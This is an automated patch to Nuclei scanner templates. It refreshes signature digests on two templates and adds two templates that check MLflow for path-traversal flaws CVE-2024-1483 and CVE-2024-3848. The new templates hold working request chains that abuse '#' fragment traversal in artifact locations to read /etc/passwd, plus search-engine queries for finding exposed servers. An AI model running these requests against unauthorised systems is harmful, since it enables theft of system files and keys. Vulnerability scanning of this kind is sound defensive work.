From 2d0b2d1663ab216cf1a64b443e5bbfabb87ad029 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 3 Dec 2024 18:27:55 +0000 Subject: [PATCH] Auto Update Nuclei [Tue Dec 3 18:27:55 UTC 2024] :robot: --- .../experience_manager/CVE-2019-16469.yaml | 2 +- plugins/apache/solr/CVE-2024-45216.yaml | 2 +- plugins/lfprojects/mlflow/CVE-2024-1483.yaml | 104 +++++++++++++++ plugins/lfprojects/mlflow/CVE-2024-3848.yaml | 120 ++++++++++++++++++ 4 files changed, 226 insertions(+), 2 deletions(-) create mode 100644 plugins/lfprojects/mlflow/CVE-2024-1483.yaml create mode 100644 plugins/lfprojects/mlflow/CVE-2024-3848.yaml diff --git a/plugins/adobe/experience_manager/CVE-2019-16469.yaml b/plugins/adobe/experience_manager/CVE-2019-16469.yaml index 4190fc9a1..619a91d55 100644 --- a/plugins/adobe/experience_manager/CVE-2019-16469.yaml +++ b/plugins/adobe/experience_manager/CVE-2019-16469.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082a6643645b37e01702752b369d5254b3ae3d9f54ebe564751e3ba7fa7b50d75022100b5ec6f99589fd782251e81288b7f5371de99c72c79d0a95e80a956314b737dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5ef3520351c980a0b96e60921b52a3e36df3b5f1fd18186aae8a464a815f24e022100c039ae6cdf25ae2452a44ca358cb7f3eda64f4dd99bc3463f076f4beaac6d52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/apache/solr/CVE-2024-45216.yaml b/plugins/apache/solr/CVE-2024-45216.yaml index 368b6ceff..a8031b9d3 100644 --- a/plugins/apache/solr/CVE-2024-45216.yaml +++ b/plugins/apache/solr/CVE-2024-45216.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b754f6c37b0d92438636734fe3b337640249ddb1cdde8b77ae21fed14a9885602206fa4c72b7d7d5ef40885c9be4956f9b87c0d9045db5e3daf60096887a947adb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220439395c4c4d636d1a944826400c9ec5f45a8b1fdde723a523e44a73b4794b8c4022078f145c4e9a5a3ca39a89b3d32a3fe5880e262dd7757a4f0acaa55beb1e96e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/lfprojects/mlflow/CVE-2024-1483.yaml b/plugins/lfprojects/mlflow/CVE-2024-1483.yaml new file mode 100644 index 000000000..3c830d05b --- /dev/null +++ b/plugins/lfprojects/mlflow/CVE-2024-1483.yaml @@ -0,0 +1,104 @@ +id: CVE-2024-1483 + +info: + name: Mlflow < 2.9.2 - Path Traversal + author: gy741 + severity: high + description: | + A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers. + impact: | + Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. + remediation: | + To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. + reference: + - https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d + - https://nvd.nist.gov/vuln/detail/CVE-2024-1483 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-1483 + cwe-id: CWE-29 + epss-score: 0.00044 + epss-percentile: 0.11996 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 5 + vendor: lfprojects + product: mlflow + shodan-query: "http.title:\"mlflow\"" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" + tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"} + + - | + POST /api/2.0/mlflow/runs/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"experiment_id": "{{EXPERIMENT_ID}}"} + + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}"} + + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"} + + - | + GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body_5 + regex: + - "root:.*:0:0:" + + - type: word + part: header_5 + words: + - "filename=passwd" + - "application/octet-stream" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: json + part: body_1 + name: EXPERIMENT_ID + group: 1 + json: + - '.experiment_id' + internal: true + + - type: json + part: body_2 + name: RUN_ID + group: 1 + json: + - '.run.info.run_id' + internal: true +# digest: 490a00463044022044f612e503d042e18e2ce06ed12d00b953d7229708ff7bec87ae951cefd422ca02206ad527749aa0b2d8f6198d6e641542219b917c96136b9d4a252f41e569097951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/plugins/lfprojects/mlflow/CVE-2024-3848.yaml b/plugins/lfprojects/mlflow/CVE-2024-3848.yaml new file mode 100644 index 000000000..be99bf9fc --- /dev/null +++ b/plugins/lfprojects/mlflow/CVE-2024-3848.yaml @@ -0,0 +1,120 @@ +id: CVE-2024-3848 + +info: + name: Mlflow < 2.11.0 - Path Traversal + author: gy741 + severity: high + description: | + A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal. + impact: | + Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. + remediation: | + To fix this vulnerability, it is important to update the mlflow package to the latest version 2.12.1. + reference: + - https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610 + - https://nvd.nist.gov/vuln/detail/CVE-2024-3848 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-3848 + cwe-id: CWE-29 + epss-score: 0.00043 + epss-percentile: 0.10425 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 5 + vendor: lfprojects + product: mlflow + shodan-query: "http.title:\"mlflow\"" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" + tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects + +variables: + random: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}", "artifact_location": "http://host#/../../../../../../../../../../../../../../etc/"} + + - | + POST /api/2.0/mlflow/runs/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"experiment_id": "{{EXPERIMENT_ID}}"} + + - | + POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1 + Host: {{Hostname}} + + {{random}} + + - | + POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"experiment_id": "{{EXPERIMENT_ID}}"} + + - | + POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}"} + + - | + POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"} + + - | + GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body_7 + regex: + - "root:.*:0:0:" + + - type: word + part: header_7 + words: + - "filename=passwd" + - "application/octet-stream" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: json + part: body_1 + name: EXPERIMENT_ID + group: 1 + json: + - '.experiment_id' + internal: true + + - type: json + part: body_2 + name: RUN_ID + group: 1 + json: + - '.run.info.run_id' + internal: true +# digest: 4b0a00483046022100c3409c8b66d6382e4cb01617ac1c4567e106c3d987267eaf4ae4041c23e6f5ab022100b18bf7148d1401117f5ba47f34b064fed6df63a199821cc4794aebbf675d6a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file